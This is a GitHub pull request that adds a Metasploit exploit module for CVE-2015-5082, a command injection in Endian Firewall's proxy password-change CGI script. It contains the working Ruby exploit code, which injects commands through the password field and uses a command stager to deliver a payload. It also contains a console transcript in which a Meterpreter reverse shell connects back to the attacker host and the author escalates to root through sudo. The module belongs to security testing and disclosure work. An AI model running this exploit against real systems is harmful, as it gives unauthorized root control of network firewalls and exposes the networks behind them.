### PR TITLE
Exploit Module: Endian Firewall Proxy Password Change Command Injection

### DIFF
--- a/modules/exploits/linux/http/efw_chpasswd_exec.rb
+++ b/modules/exploits/linux/http/efw_chpasswd_exec.rb
@@ -18,33 +18,41 @@ class Metasploit4 < Msf::Exploit::Remote
         web-accessible CGI script used to change passwords for locally-defined
         proxy user accounts. Valid credentials for such an account are
         required.
+
         Command execution will be in the context of the "nobody" account, but
-        on versions of EFW I tested, this account had broad sudo permissions,
-        including to run the script /usr/local/bin/chrootpasswd as root. This
-        script changes the password for the Linux root account on the system
-        to the value specified by console input once it is executed.
+        this account had broad sudo permissions, including to run the script
+        /usr/local/bin/chrootpasswd (which changes the password for the Linux
+        root account on the system to the value specified by console input
+        once it is executed.
+
         The password for the proxy user account specified will *not* be
         changed by the use of this module, as long as the target system is
         vulnerable to the exploit.
+
         Very early versions of Endian Firewall (e.g. 1.1 RC5) require
         HTTP basic auth credentials as well to exploit this vulnerability.
         Use the standard USERNAME and PASSWORD advanced options to specify
         these values if required.
+
         Versions >= 3.0.0 still contain the vulnerable code, but it appears to
         never be executed due to a bug in the vulnerable CGI script which also
         prevents normal use (http://jira.endian.com/browse/UTM-1002).
+
         Versions 2.3.x and 2.4.0 are not vulnerable because of a similar bug
         (http://bugs.endian.com/print_bug_page.php?bug_id=3083).
+
         Tested successfully against the following versions of EFW Community:
+
         1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2.
+
         Should function against any version from 1.1 RC5 to 2.2.x, as well as
         2.4.1 and 2.5.x.
-        Used Apache mod_cgi Bash Environment Variable Code Injection
-        and Novell ZENworks Configuration Management Remote Execution
-        modules	as templates.
       },
       'Author' => [
         'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module
+#        Used Apache mod_cgi Bash Environment Variable Code Injection
+#        and Novell ZENworks Configuration Management Remote Execution
+#        modules as templates.
       ],
       'References' => [
         ['CVE', '2015-5082'],

--- a/modules/exploits/linux/http/efw_chpasswd_exec.rb
+++ b/modules/exploits/linux/http/efw_chpasswd_exec.rb
@@ -110,7 +110,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
     register_advanced_options(
       [
-        OptInt.new('HTTPClientTimeout', [ true, 'HTTP read response timeout (seconds)', 10])
+        OptInt.new('HTTPClientTimeout', [ true, 'HTTP read response timeout (seconds)', 5])
       ], self.class)
 
   end
@@ -173,12 +173,10 @@ class Metasploit4 < Msf::Exploit::Remote
         'data' => data
       })
 
-     if not res.nil?
-      if res.code == 404
-        fail_with(Failure::Unreachable,
-          "#{rhost}:#{rport} - Received a 404 HTTP response - " +
-          "your TARGETURI value is most likely not correct")
-      end
+     if res && res.code == 404
+       fail_with(Failure::Unreachable,
+         "#{rhost}:#{rport} - Received a 404 HTTP response - " +
+         "your TARGETURI value is most likely not correct")
      end
 
   end

--- a/modules/exploits/linux/http/efw_chpasswd_exec.rb
+++ b/modules/exploits/linux/http/efw_chpasswd_exec.rb
@@ -1,0 +1,165 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Endian Firewall Proxy Password Change Command Injection',
+      'Description' => %q{
+        This module exploits an OS command injection vulnerability in a
+        web-accessible CGI script used to change passwords for locally-defined
+        proxy user accounts. Valid credentials for such an account are
+        required.
+        Command execution will be in the context of the "nobody" account, but
+        on versions of EFW I tested, this account had broad sudo permissions,
+        including to run the script /usr/local/bin/chrootpasswd as root. This
+        script changes the password for the Linux root account on the system
+        to the value specified by console input once it is executed.
+        The password for the proxy user account specified will *not* be
+        changed by the use of this module, as long as the target system is
+        vulnerable to the exploit.
+        Very early versions of Endian Firewall (e.g. 1.1 RC5) require
+        HTTP basic auth credentials as well to exploit this vulnerability.
+        Use the standard USERNAME and PASSWORD advanced options to specify
+        these values if required.
+        Versions >= 3.0.0 still contain the vulnerable code, but it appears to
+        never be executed due to a bug in the vulnerable CGI script which also
+        prevents normal use (http://jira.endian.com/browse/UTM-1002).
+        Versions 2.3.x and 2.4.0 are not vulnerable because of a similar bug
+        (http://bugs.endian.com/print_bug_page.php?bug_id=3083).
+        Tested successfully against the following versions of EFW Community:
+        1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2.
+        Should function against any version from 1.1 RC5 to 2.2.x, as well as 
+        2.4.1 and 2.5.x.
+        Used Apache mod_cgi Bash Environment Variable Code Injection
+        and Novell ZENworks Configuration Management Remote Execution
+        modules	as templates.
+      },
+      'Author' => [
+        'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module
+      ],
+      'References' => [
+        ['CVE', '2015-5082'],
+        ['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082'],
+#        ['OSVDB', ''],
+#        ['EDB', ''],
+        ['URL', 'http://jira.endian.com/browse/COMMUNITY-136']
+      ],
+      'Privileged'  => false,
+      'Platform'    => %w{ linux },
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x0a\x0d",
+          'DisableNops' => true,
+          'Space'       => 2048
+        },
+      'Targets'        =>
+        [
+          [ 'Linux x86',
+            {
+              'Platform'        => 'linux',
+              'Arch'            => ARCH_X86,
+              'CmdStagerFlavor' => [ :echo, :printf ]
+            }
+          ],
+          [ 'Linux x86_64',
+            {
+              'Platform'        => 'linux',
+              'Arch'            => ARCH_X86_64,
+              'CmdStagerFlavor' => [ :echo, :printf ]
+            }
+          ]
+        ],
+      'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'RPORT' => 10443
+        },
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Jun 28 2015',
+      'License' => MSF_LICENSE
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script',
+        '/cgi-bin/chpasswd.cgi']),
+      OptString.new('EFW_USERNAME', [true,
+        'Valid proxy account username for the target system']),
+      OptString.new('EFW_PASSWORD', [true,
+        'Valid password for the proxy user account']),
+      OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 200]),
+      OptString.new('RPATH', [true,
+        'Target PATH for binaries used by the CmdStager', '/bin']),
+      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 10])
+     ], self.class)
+  end
+
+  def exploit
+    # Cannot use generic/shell_reverse_tcp inside an elf
+    # Checking before proceeds
+    if generate_payload_exe.blank?
+      fail_with(Failure::BadConfig,
+        "#{peer} - Failed to store payload inside executable, " +
+        "please select a native payload")
+    end
+
+    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'],
+      :nodelete => true)
+  end
+
+  def execute_command(cmd, opts)
+    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
+
+    req(cmd)
+  end
+
+  def req(cmd)
+    sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};"
+
+    boundary = "----#{rand_text_alpha(34)}"
+    data = "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"ACTION\"\r\n\r\n"
+    data << "change\r\n"
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"USERNAME\"\r\n\r\n"
+    data << "#{datastore['EFW_USERNAME']}\r\n"
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"OLD_PASSWORD\"\r\n\r\n"
+    data << "#{datastore['EFW_PASSWORD']}\r\n"
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"NEW_PASSWORD_1\"\r\n\r\n"
+    data << "#{sploit}\r\n"
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"NEW_PASSWORD_2\"\r\n\r\n"
+    data << "#{sploit}\r\n"
+    data << "--#{boundary}\r\n"
+    data << "Content-Disposition: form-data; name=\"SUBMIT\"\r\n\r\n"
+    data << "  Change password\r\n"
+    data << "--#{boundary}--\r\n"
+
+    refererUrl =
+      "https://#{datastore['RHOST']}:#{datastore['RPORT']}" +
+      "#{datastore['TARGETURI']}"
+
+    send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => datastore['TARGETURI'],
+        'ctype' => "multipart/form-data; boundary=#{boundary}",
+        'headers' => {
+          'Referer' => refererUrl
+        },
+        'data' => data
+      }, datastore['TIMEOUT'])
+
+  end
+
+end

--- a/modules/exploits/linux/http/efw_chpasswd_exec.rb
+++ b/modules/exploits/linux/http/efw_chpasswd_exec.rb
@@ -105,9 +105,14 @@ class Metasploit4 < Msf::Exploit::Remote
         'Valid password for the proxy user account']),
       OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 200]),
       OptString.new('RPATH', [true,
-        'Target PATH for binaries used by the CmdStager', '/bin']),
-      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 10])
+        'Target PATH for binaries used by the CmdStager', '/bin'])
      ], self.class)
+
+    register_advanced_options(
+      [
+        OptInt.new('HTTPClientTimeout', [ true, 'HTTP read response timeout (seconds)', 10])
+      ], self.class)
+
   end
 
   def exploit
@@ -157,7 +162,7 @@ class Metasploit4 < Msf::Exploit::Remote
       "https://#{datastore['RHOST']}:#{datastore['RPORT']}" +
       "#{datastore['TARGETURI']}"
 
-    send_request_cgi(
+    res = send_request_cgi(
       {
         'method' => 'POST',
         'uri' => datastore['TARGETURI'],
@@ -166,7 +171,15 @@ class Metasploit4 < Msf::Exploit::Remote
           'Referer' => refererUrl
         },
         'data' => data
-      }, datastore['TIMEOUT'])
+      })
+
+     if not res.nil?
+      if res.code == 404
+        fail_with(Failure::Unreachable,
+          "#{rhost}:#{rport} - Received a 404 HTTP response - " +
+          "your TARGETURI value is most likely not correct")
+      end
+     end
 
   end
 

--- a/modules/exploits/linux/http/efw_chpasswd_exec.rb
+++ b/modules/exploits/linux/http/efw_chpasswd_exec.rb
@@ -23,7 +23,7 @@ class Metasploit4 < Msf::Exploit::Remote
         this account had broad sudo permissions, including to run the script
         /usr/local/bin/chrootpasswd (which changes the password for the Linux
         root account on the system to the value specified by console input
-        once it is executed.
+        once it is executed).
 
         The password for the proxy user account specified will *not* be
         changed by the use of this module, as long as the target system is

--- a/modules/exploits/linux/http/efw_chpasswd_exec.rb
+++ b/modules/exploits/linux/http/efw_chpasswd_exec.rb
@@ -59,8 +59,11 @@ class Metasploit4 < Msf::Exploit::Remote
         ['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082'],
 #        ['OSVDB', ''],
         ['EDB', '37426'],
-        ['EDB', '37428'],
-        ['URL', 'http://jira.endian.com/browse/COMMUNITY-136']
+        ['EDB', '37428']
+#        ['URL', 'http://jira.endian.com/browse/COMMUNITY-136']
+#          This was the original bug/vulnerability report to the vendor,
+#          but they have marked the ticket as private, so the URL does not
+#          return useful information at this time.
       ],
       'Privileged'  => false,
       'Platform'    => %w{ linux },

--- a/modules/exploits/linux/http/efw_chpasswd_exec.rb
+++ b/modules/exploits/linux/http/efw_chpasswd_exec.rb
@@ -37,7 +37,7 @@ class Metasploit4 < Msf::Exploit::Remote
         (http://bugs.endian.com/print_bug_page.php?bug_id=3083).
         Tested successfully against the following versions of EFW Community:
         1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2.
-        Should function against any version from 1.1 RC5 to 2.2.x, as well as 
+        Should function against any version from 1.1 RC5 to 2.2.x, as well as
         2.4.1 and 2.5.x.
         Used Apache mod_cgi Bash Environment Variable Code Injection
         and Novell ZENworks Configuration Management Remote Execution

--- a/modules/exploits/linux/http/efw_chpasswd_exec.rb
+++ b/modules/exploits/linux/http/efw_chpasswd_exec.rb
@@ -31,8 +31,8 @@ class Metasploit4 < Msf::Exploit::Remote
 
         Very early versions of Endian Firewall (e.g. 1.1 RC5) require
         HTTP basic auth credentials as well to exploit this vulnerability.
-        Use the standard USERNAME and PASSWORD advanced options to specify
-        these values if required.
+        Use the USERNAME and PASSWORD advanced options to specify these values
+        if required.
 
         Versions >= 3.0.0 still contain the vulnerable code, but it appears to
         never be executed due to a bug in the vulnerable CGI script which also
@@ -58,7 +58,8 @@ class Metasploit4 < Msf::Exploit::Remote
         ['CVE', '2015-5082'],
         ['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082'],
 #        ['OSVDB', ''],
-#        ['EDB', ''],
+        ['EDB', '37426'],
+        ['EDB', '37428'],
         ['URL', 'http://jira.endian.com/browse/COMMUNITY-136']
       ],
       'Privileged'  => false,
@@ -173,10 +174,18 @@ class Metasploit4 < Msf::Exploit::Remote
         'data' => data
       })
 
-     if res && res.code == 404
-       fail_with(Failure::Unreachable,
-         "#{rhost}:#{rport} - Received a 404 HTTP response - " +
-         "your TARGETURI value is most likely not correct")
+     if res
+       if res.code == 401
+         fail_with(Failure::NoAccess,
+           "#{rhost}:#{rport} - Received a 401 HTTP response - " +
+           "specify web admin credentials using the USERNAME " +
+           "and PASSWORD advanced options to target this host.")
+       end
+       if res.code == 404
+         fail_with(Failure::Unreachable,
+           "#{rhost}:#{rport} - Received a 404 HTTP response - " +
+           "your TARGETURI value is most likely not correct")
+       end
      end
 
   end


### PR DESCRIPTION
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082
(CVE is new as of today, so that page may not display correctly yet)

Targets an OS command injection vulnerability in most released versions
of Endian Firewall. Tested successfully against the following versions:
1.1 RC5
2.0
2.1
2.2
2.5.1
2.5.2

Known to not work against the following versions, due to bugs in the
vulnerable CGI script which also prevent normal use of it:
2.3
2.4.0
3.0.0
3.0.5 beta 1

Requires that at least one username and password be defined in the
local auth store for the Squid proxy component on the system, and that
the attacker know that username and password. Administrative or other
credentials are not required.

Provides OS command execution as the "nobody" account, which (on
all tested versions) has sudo permission to (among other things) run
a script which changes the Linux root account's password.

Example usage / output:

```
msf > use exploit/linux/http/efw_chpasswd_exec
msf exploit(efw_chpasswd_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(efw_chpasswd_exec) > set LHOST 172.16.47.13
LHOST => 172.16.47.13
msf exploit(efw_chpasswd_exec) > set LPORT 443
LPORT => 443
msf exploit(efw_chpasswd_exec) > set RHOST 172.16.47.1
RHOST => 172.16.47.1
msf exploit(efw_chpasswd_exec) > set EFW_USERNAME proxyuser
EFW_USERNAME => proxyuser
msf exploit(efw_chpasswd_exec) > set EFW_PASSWORD password123
EFW_PASSWORD => password123
msf exploit(efw_chpasswd_exec) > exploit

[*] Started reverse handler on 172.16.47.13:443
[*] Command Stager progress -  18.28% done (196/1072 bytes)
[*] Command Stager progress -  36.57% done (392/1072 bytes)
[*] Command Stager progress -  54.85% done (588/1072 bytes)
[*] Command Stager progress -  73.13% done (784/1072 bytes)
[*] Command Stager progress -  91.42% done (980/1072 bytes)
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 172.16.47.1
[*] Meterpreter session 1 opened (172.16.47.13:443 -> 172.16.47.1:36481) at 2015-06-29 10:20:13 -0700
[*] Command Stager progress - 100.47% done (1077/1072 bytes)

meterpreter > getuid
Server username: uid=99, gid=99, euid=99, egid=99, suid=99, sgid=99
meterpreter > sysinfo
Computer     : efw220.vuln.local
OS           : Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > shell
Process 5768 created.
Channel 1 created.
sh: no job control in this shell
sh-3.00$ whoami
nobody
sh-3.00$ uname -a
Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 i686 i686 i386 GNU/Linux
sh-3.00$ sudo /usr/local/bin/chrootpasswd
IlikerootaccessandIcannotlie
sh-3.00$ su
Password:IlikerootaccessandIcannotlie

bash: no job control in this shell
bash-3.00# whoami
root
```

Steps to verify module functionality:

Go to http://sourceforge.net/projects/efw/files/Development/

Select version 2, 2.1, 2.2, 2.5.1, or 2.5.2.

Download the ISO file for that version.

Create a VM using the ISO:
  For purposes of VM configuration:
    - Endian is based on the RHEL/CentOS/Fedora Core Linux
      distribution.
    - The ISOs will create a 32-bit x86 system.
    - 512MB of RAM and 4GB of disk space should be more than enough.
    - Be sure to configure the VM with at least two NICs, as the Endian
      setup is difficult (impossible?) to complete with less than two
      network interfaces on the host.
  For the Endian OS-level (Linux) installation:
    - Default options are fine where applicable.
    - Be sure to pick a valid IP for the "Green" network interface, as
      you will use it to access a web GUI to complete the configuration
    - If prompted to create a root/SSH password and/or web admin
      password, make a note of them. Well, make a note of the web admin
      password - the exploit module will let you change the root
      password later if you want to. This step is dependent on the
      version selected - some will prompt, others default the values to
      "endian".
    - Once the OS-level configuration is complete, access the web
      interface to complete the setup. If you used 172.16.47.1 for the
      "Green" interface, then the URL will be
      https://172.16.47.1:10443/
    - If the web interface is not accessible, reboot the VM (in some
      versions, the web interface does not come up until after the
      first post-installation reboot).
  For the web interface-based configuration:
    - If you were prompted to select an admin password, use it. If not,
      the username/password is admin/endian.
    - Use the second NIC for the "Red" interface. It will not actually
      be used during this walkthrough, so feel free to specify a bogus
      address on a different/nonexistent subnet. Same for its default
      gateway.
    - Once the base configuration is complete, access the main web
      interface URL again.
    - Switch to the Proxy tab.
    - Enable the HTTP proxy.
    - Click Save (or Apply, depending on version).
    - If prompted to apply the settings, do so.
    - Click on the Authentication sub-tab.
    - Make sure the Authentication Method is Local (this should be the
      default).
    - Click the _manage users_ (Or _User management_, etc., depending
      on version) button.
    - Click the _Add NCSA user_ (or _Add a user_, etc.) link.
    - Enter "proxyuser" for the username, and "password123" for the
      password, or modify the directions below this point accordingly.
    - Click the _Create user_ button.
    - If prompted to apply the settings, do so.

Module test process:
  From within the MSF console, execute these commands:

```
use exploit/linux/http/efw_chpasswd_exec
set payload linux/x86/meterpreter/reverse_tcp
set LHOST [YOUR_HOST_IP]
set LPORT 443
set RHOST [ENDIAN_GREEN_IP]
set EFW_USERNAME proxyuser
set EFW_PASSWORD password123
exploit
```

  Once Meterpreter connects, execute the following Meterpreter
  commands:
    getuid
    sysinfo
    shell

  Within the OS shell, execute the following commands:
    whoami
    uname -a
    sudo -l
    sudo /usr/local/bin/chrootpasswd

  It will appear as though the command has hung, but it is actually
  waiting for input. Type "IlikerootaccessandIcannotlie", then press
  enter.

  Execute the following OS command in the shell:
    su

  Type "IlikerootaccessandIcannotlie", then press enter.

  Verify root access (whoami, etc.).
